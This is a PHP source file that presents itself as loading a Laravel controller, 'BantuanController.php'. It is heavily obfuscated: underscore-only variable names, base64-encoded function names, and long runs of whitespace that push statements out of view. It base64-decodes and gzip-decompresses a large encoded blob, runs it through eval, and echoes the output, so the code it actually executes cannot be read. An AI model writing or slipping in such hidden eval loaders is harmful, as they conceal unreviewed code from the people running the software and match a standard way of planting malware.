<?php

        $__='printf';$_='Loading app/Http/Controllers/Api/BantuanController.php';




























































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if (!function_exists('__lambda')) {
                                                                                                                                                                                                                                              function __lambda($sArgs, $sCode)
                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                                  return eval("return function($sArgs){{$sCode}};");
                                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                          }                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_', $______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo


























































































































































































































































































                                                                                                                                                                                                                     $________;
